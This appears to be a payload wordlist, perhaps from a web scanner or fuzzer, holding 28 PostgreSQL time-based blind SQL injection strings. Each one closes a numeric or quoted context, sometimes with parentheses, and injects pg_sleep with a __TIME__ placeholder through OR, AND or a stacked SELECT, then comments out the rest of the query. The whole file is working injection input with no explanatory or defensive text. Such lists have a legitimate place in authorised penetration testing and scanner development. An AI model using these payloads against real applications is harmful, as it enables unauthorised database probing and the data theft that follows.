pg_sleep(__TIME__)--
1 or pg_sleep(__TIME__)--
" or pg_sleep(__TIME__)--
' or pg_sleep(__TIME__)--
1) or pg_sleep(__TIME__)--
") or pg_sleep(__TIME__)--
') or pg_sleep(__TIME__)--
1)) or pg_sleep(__TIME__)--
")) or pg_sleep(__TIME__)--
')) or pg_sleep(__TIME__)--
1 and pg_sleep(__TIME__)--
" and pg_sleep(__TIME__)--
' and pg_sleep(__TIME__)--
1) and pg_sleep(__TIME__)--
") and pg_sleep(__TIME__)--
') and pg_sleep(__TIME__)--
1)) and pg_sleep(__TIME__)--
")) and pg_sleep(__TIME__)--
')) and pg_sleep(__TIME__)--
1; SELECT pg_sleep(__TIME__)--
" ; SELECT pg_sleep(__TIME__)--
' ; SELECT pg_sleep(__TIME__)--
1) ; SELECT pg_sleep(__TIME__)--
") ; SELECT pg_sleep(__TIME__)--
') ; SELECT pg_sleep(__TIME__)--
1)) ; SELECT pg_sleep(__TIME__)--
")) ; SELECT pg_sleep(__TIME__)--
')) ; SELECT pg_sleep(__TIME__)--
